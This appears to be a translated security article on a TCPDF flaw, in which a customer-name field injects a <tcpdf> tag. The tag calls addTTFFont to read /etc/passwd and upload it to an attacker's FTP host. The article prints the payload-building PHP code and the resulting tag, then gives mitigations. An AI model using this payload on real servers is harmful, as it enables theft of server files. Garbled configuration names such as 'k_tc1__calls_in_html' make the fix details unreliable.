Hackers use PDF generators to steal files on WEB Servers

Hackers use PDF generators to steal files on WEB Servers

Tcpdf pdf builder is one of the most popular PHP libraries used to create PDF documents and one of the most popular open source projects today. It has millions of users every day, and its carrier is generally CMS programs or other WEB applications. However, hackers can easily steal files from WEB servers by exploiting the TCPDF vulnerability.

Vulnerability exploitation scenarios

1. Alice is the owner of an online store. She will send a PDF document to the customer as a receipt, which shows the purchase information and buyer information. 2. At this moment, an attacker named Chuck noticed that Alice forgot to filter the data in the "customer name" column before writing the PDF document. 3. Chuck found through research that he could write a post in the "customer name" column of the order in the PDF document, and fill in the constructed malicious payload (attack load ). When a PDF file is generated, malicious scripts are executed to steal files from Alice's online shop server.

Attack Process

So why are the above scenarios? The specific details are as follows:

Chuck entered the malicious Payload in the "customer name". It tried to tell Alice the server's PDF builder that he wanted to add a font containing the server itself, finally, upload the font file to Chuck's FTP server.

However, the PDF builder does not check the so-called "font" file and the address of the file to be sent. This vulnerability allows Chuck to steal any readable files under the PHP permission on the server.

Understanding TCPDF

There are many methods to design a PDF in TCPDF mode. The most common method is to create a simple HTML page and add HTML code to TCPDF. Common HTML tags are parsed and converted to PDF format. Such as table, image, and header.

However, a special tag <tcpdf/> is also enabled by default. This is a special label for calling methods by the TCPDF class. The element example is as follows:

 

<tcpdfmethod="MethodFromTCPDFClass"params="EscapedParamData" />

If the HTML element is passed to writeHTML and the tcpdf method "methodfromtc0000class" is valid, TCPDF executes this special method with other parameters.

In other words, if a user passes the data that has not been checked to writeHTML, the user may secretly call a method that runs the TCPDF class. TCPDF methods may be used by hackers.

Font Loading Method

The TCPDF class has a method named addTTFFont, which describes: "It can convert fonts and add TrueType or Type1 fonts to the fonts ". Of course, this can also be used to compress any readable file on the server and send it to any writable address. Naturally, this address can also be a remote server of hackers.

The addTTFFont method has the following Association parameters:

$ Fontfile: the path of any writable file to be extracted on the server. $ Fonttype -- the TrueType $ outpath that the hacker needs to set -- the output address of the file. Here, you can enter a hacker's FTP address.

To generate a tcpdf element, use the following code:

$params = TCPDF_STATIC::serializeTCPDFtagParameters(array('/etc/passwd','TrueType','',255,urldecode('ftp://user:pass@host/')));

The result is as follows:

<tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fpasswd%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fuser%3Apass%40host%5C%2F%22%5D"/>

 

If we can inject code into a generated PDF file using TCPDF, the server will capture the contents of the local/etc/passwd when generating the parsing, and upload it to the hacker's FTP server.

TCPDF Security

Now you need to upgrade TCPDF to the latest version. Of course, we have more than one solution. To address this vulnerability, we can:

In php. ini, set allow_url_fopen to Off in config/tc1__config.php and set k_tc1__calls_in_html to false.